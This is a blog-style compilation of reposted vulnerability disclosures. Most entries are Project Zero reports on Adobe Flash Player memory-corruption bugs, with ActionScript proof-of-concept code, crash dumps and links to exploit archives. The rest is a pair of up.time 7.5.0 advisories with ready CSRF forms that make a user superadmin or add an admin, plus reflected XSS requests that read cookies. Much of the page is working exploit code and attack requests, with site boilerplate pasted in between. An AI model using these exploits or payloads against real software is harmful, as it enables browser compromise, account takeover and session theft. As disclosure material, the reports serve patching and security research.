Source: https://code.google.com/p/google-security-research/issues/detail?id=400&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
The attached sample file, signal_sigsegv_7ffff637297a_8900_e3f87b25c25db8f9ec3c975f8c1211cc.swf, crashes, perhaps relating to XML handling.
The crash looks like this on Linux x64:
=> 0x00007f6931226f22: mov 0x8(%rcx),%eax
rcx 0x303030303030300 217020518514230016
The wider context shows that the wild pointer target can be incremented with this vulnerability, which is typically enough for an exploit:
=> 0x00007f6931226f22: mov 0x8(%rcx),%eax <--- read
0x00007f6931226f25: test %eax,%eax
0x00007f6931226f27: je 0x7f6931226f80
0x00007f6931226f29: test $0x40000000,%eax
0x00007f6931226f2e: jne 0x7f6931226f80
0x00007f6931226f30: add $0x1,%eax <--- increment
0x00007f6931226f33: cmp $0xff,%al
0x00007f6931226f35: mov %eax,0x8(%rcx) <--- write back
The base sample from which this fuzz case was generated is also attached, e3f87b25c25db8f9ec3c975f8c1211cc.swf
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37870.zip
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863293854
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
Source: https://code.google.com/p/google-security-research/issues/detail?id=404&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
Source file and compiled PoC attached.
Looking at https://github.com/adobe-flash/avmplus/blob/master/core/XMLListObject.cpp:
bool XMLListObject::delUintProperty(uint32_t index)
...
if (index >= _length()) [1]
{
return true;
}
...
px->childChanges(core->knodeRemoved, r->atom()); [2]
...
m_children.removeAt(index); [3]
In [1], the passed in index is validated. In [2], the callback can run actionscript, which might shrink the size of the current XMLList. In [3], the pre-validated index is used but it might now be invalid due to shrinking at [2]. Unfortunately, removeAt() does not behave well in the presence of an out-of-bounds index.
The PoC works by triggering a wild copy in order to demonstrate the crash. But other side-effects are possible such as decrementing the refcount of an out-of-bounds index.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37872.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=408&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
There is a use-after-free in CreateTextField. If a flash file contains a MovieClip heirarcy, such as:
_root-->l1-->l2-->l3
If createTextField is called on l2 to create l3, and the call makes a call into a function the deletes l2 or l1, a use-after-free occurs. A POC is as follows:
var l1 = this.createEmptyMovieClip("l1", 1);
var l2 = l1.createEmptyMovieClip("l2", 1);
ns = {toString: strfunc, valueOf: strfunc};
var l3 = l2.createTextField(ns, 1, 0, 0, 10, 10);
function strfunc(){
l2.removeMovieClip();
return "myname";
}
A sample SWF and fla are attached.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37873.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=409&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
There is a type confusion issue in TextRenderer.setAdvancedAntialiasingTable. If the font, insideCutoff or outsideCutoff are set to objects that are not integers, they are still assumed to be integers. A proof-of-concept is below:
var antiAliasEntry_1 = {fontSize:10, insideCutoff:1.61, outsideCutoff:-3.43};
var antiAliasEntry_2 = {fontSize:"", insideCutoff:0.8, outsideCutoff:-0.8};
var arialTable:Array = new Array(antiAliasEntry_1, antiAliasEntry_2);
TextRenderer.setAdvancedAntialiasingTable("Arial", "none", "dark", arialTable);
This issue is low-impact because the type-confused objects are read into the font and cutoff values, which cannot be directly retreived from script. It is probably possible to determine the value read by doing hit tests on the text that is rendered (to see how big and clipped it is), but this would be fairly difficult.
A sample SWF and fla are attached, these samples intentionally crash to demonstrate the issue.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37874.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=416&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
This issue is a variant of issue 192 , which the fix did not address.
If XMLSocket connect is called on an object that already has a destroy function set, such as a BitmapData object, the method will set the user data of that object, but not clear the destroy function. This leads to type confusion when the user data is freed during garbage collection.
A PoC is as follows:
class subsocket extends flash.display.BitmapData{
public function subsocket(){
var n = {valueOf : func};
this.valueOf = func;
var x = new XMLSocket();
x.connect.call(this, "127.0.0.1", this);
}
function func(){
if(this){
}
this.__proto__ = {};
this.__proto__.__constructor__ = flash.display.BitmapData;
super(10, 10, true, 10);
return 80;
}
}
A SWF and fla are attached. Note that this PoC needs to be run on a webserver on localhost (or change the IP in the PoC to the server value), and it only crashes in Chrome on 64-bit Linux.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37876.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=410&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
The following crash was observed in Flash Player 17.0.0.188 on Windows:
(81c.854): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=37397006 ebx=00000000 ecx=008c0493 edx=09f390d0 esi=08c24d98 edi=09dc2000
eip=07a218cb esp=015eda80 ebp=015edb24 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050216
Flash32_17_0_0_188+0x18cb:
07a218cb ff6004 jmp dword ptr [eax+0x4] ds:0023:3739700a=????????
- The test case reproduces on Windows 7 using IE11. It does not appear to immediately reproduce on Windows+Chrome or Linux+Chrome.
- The crash can also reproduce on one of the two mov instructions prior to the jmp shown here.
- The crash appears to occur due to a use-after-free related to loading a sub-resource from a URL.
- The test case minimizes to an 11-bit difference from the original sample file.
- The following test cases are attached: 2038518113_crash.swf (crashing file), 2038518113_min.swf (minimized file), 2038518113_orig.swf (original non-crashing file).
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37875.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=418&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
There is a use-after-free in the TextField gridFitType setter. A PoC is below:
var test = this.createTextField("test", 1, 0, 0, 100, 100);
var n = {toString : func, valueOf : func};
test.gridFitType = n;
function func(){
test.removeTextField();
for(var i = 0; i < 1000; i++){
var b = new flash.display.BitmapData(1000, 1000, true, 10);
}
trace("here");
return "natalie";
}
A PoC and fla are attached. Some other setters (thickness, tabIndex, etc.) are also impacted by the same UaF condition, additional SWFs are attached.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37877.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=422&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
There is a type confusion issue in the TextFormat constructor that is reachable because the FileReference constructor does not verify that the incoming object is of type Object (it only checks that the object is not native backed). The TextFormat constructor first sets a new object to type TextFormat, and then calls into script several times before setting the native backing object. If one of these script calls then calls into the FileReference constructor, the object can be set to type FileReference, and then the native object will be set to the TextFormat, leading to type confusion. A PoC is as follows:
In the main SWF:
var a = new subfr();
var allTypes:Array = new Array();
var imageTypes:Object = new Object();
imageTypes.description = "Images (*.jpg, *.jpeg, *.gif, *.png)";
imageTypes.extension = "*.jpg; *.jpeg; *.gif; *.png";
allTypes.push(imageTypes);
var textTypes:Object = new Object();
textTypes.description = "Text Files (*.txt, *.rtf)";
textTypes.extension = "*.txt;*.rtf";
allTypes.push(textTypes);
var f = new flash.net.FileReference();
f.cancel.call(a);
Defining subfr:
class subfr extends Object{
public function subfr(){
var n = {valueOf : func};
this.valueOf = func;
this.toString = func;
this.__proto__ = {};
this.__proto__.__constructor__ = TextFormat;
super(this);
}
function func(){
this.__proto__ = {};
this.__proto__.__constructor__ = flash.net.FileReference;
super();
return "natalie";
}
}
A sample SWF and fla are attached.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37878.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=425&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
To reproduce, host the attached files appropriately and:
http://localhost/LoadMP4.swf?file=crash4000368.flv
If there is no crash at first, refresh the page a few times.
With a debugger attached to 64-bit Flash in Chrome Linux, the crash manifests like this:
=> 0x00007f7789d081bb <__memmove_ssse3_back+443>: movaps %xmm1,-0x10(%rdi)
rdi 0x7f7778d69200
7f777894b000-7f7778d69000 rw-p 00000000 00:00 0
7f7778d69000-7f7778d88000 ---p 00000000 00:00 0
This looks very like a heap-based buffer overflow that just happens to have walked off the end of the committed heap.
Also, this bug bears disturbing similarities to CVE-2015-3043, see for example: https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37879.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=434&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
The Shared Object constructor does not check that the object it is provided is of type Object before setting it to be of type SharedObject. This can cause problems if another method (such as Sound.loadSound) calls into script between checking the input object type, and casting its native object. A PoC is as follows:
class subso extends Sound{
public function subso(f){
super("_level0.test");
var n = {valueOf : func};
_global.func = f;
_global.t = this;
var f2 = this.loadSound;
f2.call(this, n, 1);
}
function func(){
_global.func(_global.t,"/sosuper.swf", "/sosuper.swf");
return 1;
}
}
A sample fla, swf and AS file are attached. Note that this PoC needs to be hosted on a webserver to work and only works on 32-bit systems (tested on Windows Chrome). song1.mp3 should be put in the same folder on the server as the swf, it is needed for loadSound to work. This bug is likely only exploitable on 32-bit systems due to how the type-confused fields line up.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37881.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=426&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
To reproduce, host the attached files appropriately, and:
http://localhost/LoadMP4.swf?file=crash3006694.flv
If there is no crash at first, refresh the page a few times.
With a debugger attached to 64-bit Flash in Chrome Linux, the crash manifests like this:
=> 0x00007f7779846eee: mov %ax,(%rdi,%rdx,2)
rax 0xff69
rdi 0x7f7778b70000
rdx 0x160b
7f777861e000-7f7778b72000 rw-p 00000000 00:00 0
7f7778b72000-7f7779228000 ---p 00000000 00:00 0
It looks like an indexing error; the rdi "base" address is in bounds but add on 2*rdx and the address is not in bounds.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37880.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=443&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
If an mp3 file contains compressed ID3 data that is larger than 0x2aaaaaaa bytes, an integer overflow will occur in allocating the buffer to contain its converted string data, leading to a large copy into a small buffer. A sample fla, swf and mp3 are attached. Put id34.swf and tag.mp3 in the same folder to reproduce the issue. This issue only works on 64 bit platforms.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37882.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=444&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
[Tracking for https://code.google.com/p/chromium/issues/detail?id=498984]
Credit is to bilou, working with the Chromium Vulnerability Rewards Program.
---
VULNERABILITY DETAILS
There is a use after free vulnerability in the ActionScript 2 TextField.filters array property.
This is Issue 457278 resurrected. Again.
VERSION
Chrome Version: [43.0.2357.124, Flash 18.0.0.160]
Operating System: [Windows 7 x64 SP1]
REPRODUCTION CASE
There is a use after free vulnerability in the ActionScript 2 TextField.filters array property.
This is Issue 457278 resurrected. Again.
When the TextField.filters array is set, Flash creates an internal array holding the filters. When the property is read, Flash iterates over this array and clones each filter. During this loop, it is possible to execute some AS2 by overriding a filter's constructor. At that moment, if the AS2 code alters the filters array, Flash frees the internal array leaving a reference to freed memory in the stack. When the execution flow resumes to the loop, a use-after-free occurs.
Flash 17.0.0.169 added a flag to mitigate Issue 457278
.text:004D6F0B mov esi, [esp+2Ch+var_C]
.text:004D6F0F push 1 ; char
.text:004D6F11 mov ecx, edi ; int
.text:004D6F13 mov byte ptr [esi+0Ch], 1 ; this flag was added
.text:004D6F17 call xparseAS2Code
.text:004D6F1C mov byte ptr [esi+0Ch], 0
Flash 18.0.0.160 added an other flag to mitigate Issue 476926
.text:004D6E3E loc_4D6E3E:
.text:004D6E3E cmp byte ptr [ebp+0Ch], 0 ; this flag was added
.text:004D6E42 lea eax, [ebp+0Ch]
.text:004D6E45 mov [esp+2Ch+var_8], eax
.text:004D6E49 jz short loc_4D6E58
.text:004D6E4B mov ecx, dword_E50A40
.text:004D6E51 call sub_967730
.text:004D6E58
.text:004D6E58 loc_4D6E58:
.text:004D6E58 mov byte ptr [eax], 1
.text:004D6E5B jmp short loc_4D6E65
But they didn't figure it was possible to execute AS2 code a bit above in the function:
.text:004D6E6F mov eax, [ebp+0]
.text:004D6E72 push 0
.text:004D6E74 lea edx, [esp+34h+var_14]
.text:004D6E78 push edx
.text:004D6E79 mov edx, [eax+14h]
.text:004D6E7C mov ecx, ebp
.text:004D6E7E call edx ; return the filter name
.text:004D6E80 push eax
.text:004D6E81 lea eax, [esp+3Ch+var_10]
.text:004D6E85 push eax
.text:004D6E86 mov ecx, edi
.text:004D6E88 call xcreateStringObject
.text:004D6E8D mov ebx, [esp+38h+arg_4]
.text:004D6E91 push eax
.text:004D6E92 push ecx
.text:004D6E93 mov eax, esp
.text:004D6E95 mov ecx, edi
.text:004D6E97 mov [eax], ebx
.text:004D6E99 call sub_420400 ; execute some AS2 with a custom __proto__ object
For ex:
var oob = {}
oob.__proto__ = {}
oob.__proto__.addProperty("GlowFilter", function () {f(); return 0x123}, function () {});
flash.filters = oob
Tested on Flash Player standalone 18.0.0.160, and Chrome 43.0.2357.124.
That should crash while dereferencing 0x41424344.
Compile with Flash CS 5.5.
***************************************************************************
Content of FiltusPafusTer.fla
import flash.filters.GlowFilter;
var a1:Array = new Array()
var a2:Array = new Array()
for (i = 0; i<0x50/4;i++) {
a2[i] = 0x41424344
}
for (var i = 0; i<0x200;i++) {
var tf:TextFormat = new TextFormat()
a1[i] = tf
}
for (var i = 0; i<0x200;i++) {
a1[i].tabStops = a2
}
var tfield:TextField = createTextField("tf",1,1,2,3,4)
var glowfilter:GlowFilter = new GlowFilter(1,2,3,4,5,6,true,true)
tfield.filters = [glowfilter]
function f() {
for (var i = 0; i<0x20;i++) {
_global.a1[0x100+i*4].tabStops = [1,2,3,4]
}
_global.tfield.filters = []
for (var i = 0; i<0x200;i++) {
_global.a1[i].tabStops = a2
}
}
_global.tfield = tfield
_global.a1 = a1
_global.a2 = a2
var oob = {}
oob.__proto__ = {}
oob.__proto__.addProperty("GlowFilter", function () {f(); return 0x123}, function () {});
flash.filters = oob
var a = tfield.filters
---
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37883.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=484&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
[Tracking for: https://code.google.com/p/chromium/issues/detail?id=508072]
VULNERABILITY DETAILS
Copy Paste of Issue 480496
VERSION
Chrome Version: N/A yet, Flash 18.0.0.203
Operating System: [Win7 x64 SP1]
REPRODUCTION CASE
Flash 18.0.0.203 patched Issue 480496 by checking if the internal filter object is still alive after the first Array.length call (from Flash player standalone):
.text:004D71DA loc_4D71DA:
.text:004D71DA and ecx, 0FFFFFFF8h
.text:004D71DD call xAS2_getArrayLength
.text:004D71E2 test eax, eax
.text:004D71E4 jle short loc_4D725D
.text:004D71E6 mov ecx, [esp+8+arg_C]
.text:004D71EA mov eax, [ecx+94h]
.text:004D71F0 test eax, 0FFFFFFFEh
.text:004D71F5 jz short loc_4D7200
.text:004D71F7 and eax, 0FFFFFFFEh
.text:004D71FA cmp dword ptr [eax+28h], 0 ; here we check whether the object has been deleted or not
.text:004D71FE jnz short loc_4D720B
.text:004D7200
.text:004D7200 loc_4D7200:
.text:004D7200 mov ecx, dword_E51A40
.text:004D7206 call sub_968A00 ; and in that case we suicide
Unfortunately they forget to do that check after the second Array.length call:
.text:004D721D loc_4D721D:
.text:004D721D and eax, 0FFFFFFF8h
.text:004D7220 push edi
.text:004D7221 mov edi, eax
.text:004D7223 mov ecx, edi
.text:004D7225 xor esi, esi
.text:004D7227 call xAS2_getArrayLength ; here we can still execute a script and delete the filters...
.text:004D722C test eax, eax
.text:004D722E jle short loc_4D725C
Should crash that way:
CPU Disasm
Address Hex dump Command Comments
004CE27F 8B51 04 MOV EDX,DWORD PTR DS:[ECX+4]
004CE282 8942 04 MOV DWORD PTR DS:[EDX+4],EAX ; write a pointer to 0x41424344
004CE285 8B51 04 MOV EDX,DWORD PTR DS:[ECX+4]
004CE288 8950 08 MOV DWORD PTR DS:[EAX+8],EDX
004CE28B FF41 08 INC DWORD PTR DS:[ECX+8]
004CE28E 8941 04 MOV DWORD PTR DS:[ECX+4],EAX
004CE291 C2 0400 RETN 4
004CE294 FF41 08 INC DWORD PTR DS:[ECX+8]
***************************************************************************
Content of flash_as2_filters_uaf_write4_poc.fla
//Compile that with Flash CS5.5 and change the property "s" in the swf to "4"
//It's because Flash CS5.5 does not allow naming a property with a numeral
import flash.filters.GlowFilter;
var tfield:TextField = createTextField("tf",1,1,2,3,4)
var a1:Array = new Array()
var a2:Array = new Array()
for (i = 0; i<0x3F8/4;i++) {
a2[i] = 0x41424344
}
a2[3] = 0
a2[0x324/4] = 0x41424344
a2[0x324/4 + 1] = 0x41424344
a2[0x324/4 + 2] = 0x41414143
a2[0x324/4 + 3] = 0x41414100
for (var i = 0; i<0x200;i++) {
var tf:TextFormat = new TextFormat()
a1[i] = tf
}
for (var i = 0; i<0x100;i++) {
a1[i].tabStops = a2
}
a1[0xFF].tabStops = []
function f() {
_global.mc.createTextField("tf",1,1,2,3,4)
a1[0xFE].tabStops = []
a1[0xFD].tabStops = []
for (var i = 0x100; i<0x200;i++) {
_global.a1[i].tabStops = _global.a2
}
}
_global.mc = this
_global.counter = 0
_global.a1 = a1
_global.a2 = a2
var oCounter:Object = new Object()
oCounter.valueOf = function () {
_global.counter += 1
if (_global.counter == 4) f()
return 10;
}
var o = {length:oCounter, s:new GlowFilter(1,2,3,4,5,6,true,true)}
tfield.filters = o;
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37884.zip
<!--
up.time 7.5.0 Superadmin Privilege Escalation Exploit
Vendor: Idera Inc.
Product web page: http://www.uptimesoftware.com
Affected version: 7.5.0 (build 16) and 7.4.0 (build 13)
Summary: The next-generation of IT monitoring software.
Desc: up.time suffers from a privilege escalation issue.
Normal user can elevate his/her privileges by sending
a POST request seting the parameter 'userroleid' to 1.
Attacker can exploit this issue using also cross-site
request forgery attacks.
Tested on: Jetty, PHP/5.4.34, MySQL
Apache/2.2.29 (Win64) mod_ssl/2.2.29 OpenSSL/1.0.1j PHP/5.4.34
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5251
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5251.php
29.07.2015
--
-->
<html>
<body>
<form action="http://127.0.0.1:9999/main.php?section=UserContainer&subsection=edit&id=4" method="POST">
<input type="hidden" name="operation" value="submit" />
<input type="hidden" name="disableEditOfUsernameRoleGroup" value="false" />
<input type="hidden" name="username" value="Testingus2" />
<input type="hidden" name="password" value="*****" />
<input type="hidden" name="passwordConfirm" value="*****" />
<input type="hidden" name="firstname" value="Test" />
<input type="hidden" name="lastname" value="Ingus" />
<input type="hidden" name="location" value="Neverland" />
<input type="hidden" name="emailaddress" value="test2@test.test" />
<input type="hidden" name="emailtimeperiodid" value="1" />
<input type="hidden" name="phonenumber" value="111111" />
<input type="hidden" name="phonenumbertimeperiodid" value="1" />
<input type="hidden" name="windowshost" value="test" />
<input type="hidden" name="windowsworkgroup" value="testgroup" />
<input type="hidden" name="windowspopuptimeperiodid" value="1" />
<input type="hidden" name="landingpage" value="MyPortal" />
<input type="hidden" name="isonvacation" value="0" />
<input type="hidden" name="receivealerts" value="on" />
<input type="hidden" name="receivealerts" value="1" />
<input type="hidden" name="alertoncritical" value="on" />
<input type="hidden" name="alertoncritical" value="1" />
<input type="hidden" name="alertonwarning" value="on" />
<input type="hidden" name="alertonwarning" value="1" />
<input type="hidden" name="alertonunknown" value="on" />
<input type="hidden" name="alertonunknown" value="1" />
<input type="hidden" name="alertonrecovery" value="on" />
<input type="hidden" name="alertonrecovery" value="1" />
<input type="hidden" name="activexgraphs" value="0" />
<input type="hidden" name="newuser" value="on" />
<input type="hidden" name="newuser" value="1" />
<input type="hidden" name="userroleid" value="1" />
<input type="hidden" name="usergroupid[]" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
up.time 7.5.0 XSS And CSRF Add Admin Exploit
Vendor: Idera Inc.
Product web page: http://www.uptimesoftware.com
Affected version: 7.5.0 (build 16) and 7.4.0 (build 13)
Summary: The next-generation of IT monitoring software.
Desc: The application allows users to perform certain
actions via HTTP requests without performing any validity
checks to verify the requests. This can be exploited to
perform certain actions with administrative privileges
if a logged-in user visits a malicious web site. Multiple
cross-site scripting vulnerabilities were also discovered.
The issue is triggered when input passed via the multiple
parameters is not properly sanitized before being returned
to the user. This can be exploited to execute arbitrary HTML
and script code in a user's browser session in context of
an affected site.
Tested on: Jetty, PHP/5.4.34, MySQL
Apache/2.2.29 (Win64) mod_ssl/2.2.29 OpenSSL/1.0.1j PHP/5.4.34
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5252
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5252.php
29.07.2015
--
CSRF Add Admin:
---------------
<html>
<body>
<form action="http://127.0.0.1:9999/main.php?section=UserContainer&subsection=add&id=0" method="POST">
<input type="hidden" name="operation" value="submit" />
<input type="hidden" name="disableEditOfUsernameRoleGroup" value="false" />
<input type="hidden" name="username" value="Testingus4" />
<input type="hidden" name="password" value="123123" />
<input type="hidden" name="passwordConfirm" value="123123" />
<input type="hidden" name="firstname" value="Test" />
<input type="hidden" name="lastname" value="Ingus" />
<input type="hidden" name="location" value="Neverland" />
<input type="hidden" name="emailaddress" value="test4@test.test" />
<input type="hidden" name="emailtimeperiodid" value="1" />
<input type="hidden" name="phonenumber" value="111111" />
<input type="hidden" name="phonenumbertimeperiodid" value="1" />
<input type="hidden" name="windowshost" value="test" />
<input type="hidden" name="windowsworkgroup" value="testgroup" />
<input type="hidden" name="windowspopuptimeperiodid" value="1" />
<input type="hidden" name="landingpage" value="MyPortal" />
<input type="hidden" name="isonvacation" value="0" />
<input type="hidden" name="receivealerts" value="on" />
<input type="hidden" name="receivealerts" value="1" />
<input type="hidden" name="alertoncritical" value="on" />
<input type="hidden" name="alertoncritical" value="1" />
<input type="hidden" name="alertonwarning" value="on" />
<input type="hidden" name="alertonwarning" value="1" />
<input type="hidden" name="alertonunknown" value="on" />
<input type="hidden" name="alertonunknown" value="1" />
<input type="hidden" name="alertonrecovery" value="on" />
<input type="hidden" name="alertonrecovery" value="1" />
<input type="hidden" name="activexgraphs" value="0" />
<input type="hidden" name="newuser" value="on" />
<input type="hidden" name="newuser" value="1" />
<input type="hidden" name="userroleid" value="2" />
<input type="hidden" name="usergroupid[]" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Reflected XSS:
--------------
GET /main.php?section=UserContainer&subsection=edit&id=bc6ac%22%3E%3Cimg%20src%3da%20onerror%3dalert%28document.cookie%29;%3E&name=Testingus4 HTTP/1.1
-
GET /main.php?section=UserGroup&subsection=add&operation=submit&id=0&usergroupname=kakodane1&usergroupdescription=kakodane2&usermembership%5B%5D=6&entitymembership%5B%5D=1&entitygroupmembership%5B%5D=1a416c%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea233bd169b0 HTTP/1.1
-
GET /main.php?section=UserGroup&subsection=add&operation=submit&id=0&usergroupname=kakodane1&usergroupdescription=kakodane2&usermembership%5B%5D=6&entitymembership%5B%5D=14f2e6%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e46cfd43d432&entitygroupmembership%5B%5D=1 HTTP/1.1
-
GET /main.php?section=UserContainer&subsection=edit&id=bc6ac"><img%20src%3da%20onload%3dalert(1)>f2c23&name=Testingus4 HTTP/1.1
-
GET /main.php?page=Users&subPage=UserContainer&subsection=view&id=240689'%3balert(1)%2f%2f205 HTTP/1.1
-
GET /main.php?section=UserContainer&subsection=edit&id=6&name=Testingus4e8b7f%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eadfb7 HTTP/1.1
-
GET /main.php?section=UserContainer&subsection=edit7bef8%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea9095&id=6&name=Testingus4 HTTP/1.1
-
GET /main.php?section=UserGroup&subsection=add270d4%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8c1acb1f950&operation=submit&id=0&usergroupname=kakodane1&usergroupdescription=kakodane2&usermembership%5B%5D=6&entitymembership%5B%5D=1&entitygroupmembership%5B%5D=1 HTTP/1.1
-
GET /main.php?page=Reports&subPage=ReportResourceUsage&subsection=edit&operation=submit&range_type=explicit&txtFromDate=2015-07-28a3345"><img%20src%3da%20onload%3dalert(1)>2d6845d9556&txtFromTime=00%3A00%3A00&txtToDate=2015-07-28&txtToTime=23%3A59%3A59&quickdatevalue=1&quickdatetype=day&relativedate=today&value_%5BselectAll_reportoptions%5D=false&reportoptions%5BreportResourceUtilization%5D-visible-checkbox=true&reportoptions%5BreportResourceUtilization%5D=true&reportoptions%5BchartCPUStats%5D-visible-checkbox=true&reportoptions%5BchartCPUStats%5D=true&reportoptions%5BchartMultiCPUPerformanceTotal%5D=false&reportoptions%5BchartNetworkIO%5D=false&reportoptions%5BchartNetworkErrors%5D=false&reportoptions%5BchartTCPRetransmits%5D=false&reportoptions%5BchartFreeMemory%5D=false&reportoptions%5BchartPageScanningStats%5D=false&reportoptions%5BchartDiskStats%5D=false&reportoptions%5BchartFSCap%5D=false&reportoptions%5BchartWorkloadCPU%5D=false&reportoptions%5BchartWorkloadMemSize%5D=false&reportoptions%5BchartWorkloadRSS%5D=false&reportoptions%5BgroupReportBySystem%5D-visible-checkbox=true&reportoptions%5BgroupReportBySystem%5D=true&listtype=system&value_%5BselectAll_entitygroup%5D=false&value_%5Bincludesubgroups%5D=true&includesubgroups=on&entitygroup%5B1%5D=false&value_%5BselectAll_entityview%5D=false&value_%5BselectAll_entity%5D=false&entity%5B1%5D=false&generate_xml=XML+to+Screen&email_type_save=email_user_save&user_email_id_save=1&other_email_address_save=&save_as_name=&save_as_description=&genopt=htmlscreen&email_type=email_user&user_email_id=1&other_email_address= HTTP/1.1
-
GET /main.php?page=Reports&subPage=ReportResourceUsage&subsection=edit&operation=submit&range_type=explicit&txtFromDate=2015-07-28&txtFromTime=00%3a00%3a006795f"><img%20src%3da%20onload%3dalert(1)>c92fbc98475&txtToDate=2015-07-28&txtToTime=23%3A59%3A59&quickdatevalue=1&quickdatetype=day&relativedate=today&value_%5BselectAll_reportoptions%5D=false&reportoptions%5BreportResourceUtilization%5D-visible-checkbox=true&reportoptions%5BreportResourceUtilization%5D=true&reportoptions%5BchartCPUStats%5D-visible-checkbox=true&reportoptions%5BchartCPUStats%5D=true&reportoptions%5BchartMultiCPUPerformanceTotal%5D=false&reportoptions%5BchartNetworkIO%5D=false&reportoptions%5BchartNetworkErrors%5D=false&reportoptions%5BchartTCPRetransmits%5D=false&reportoptions%5BchartFreeMemory%5D=false&reportoptions%5BchartPageScanningStats%5D=false&reportoptions%5BchartDiskStats%5D=false&reportoptions%5BchartFSCap%5D=false&reportoptions%5BchartWorkloadCPU%5D=false&reportoptions%5BchartWorkloadMemSize%5D=false&reportoptions%5BchartWorkloadRSS%5D=false&reportoptions%5BgroupReportBySystem%5D-visible-checkbox=true&reportoptions%5BgroupReportBySystem%5D=true&listtype=system&value_%5BselectAll_entitygroup%5D=false&value_%5Bincludesubgroups%5D=true&includesubgroups=on&entitygroup%5B1%5D=false&value_%5BselectAll_entityview%5D=false&value_%5BselectAll_entity%5D=false&entity%5B1%5D=false&generate_xml=XML+to+Screen&email_type_save=email_user_save&user_email_id_save=1&other_email_address_save=&save_as_name=&save_as_description=&genopt=htmlscreen&email_type=email_user&user_email_id=1&other_email_address= HTTP/1.1
-
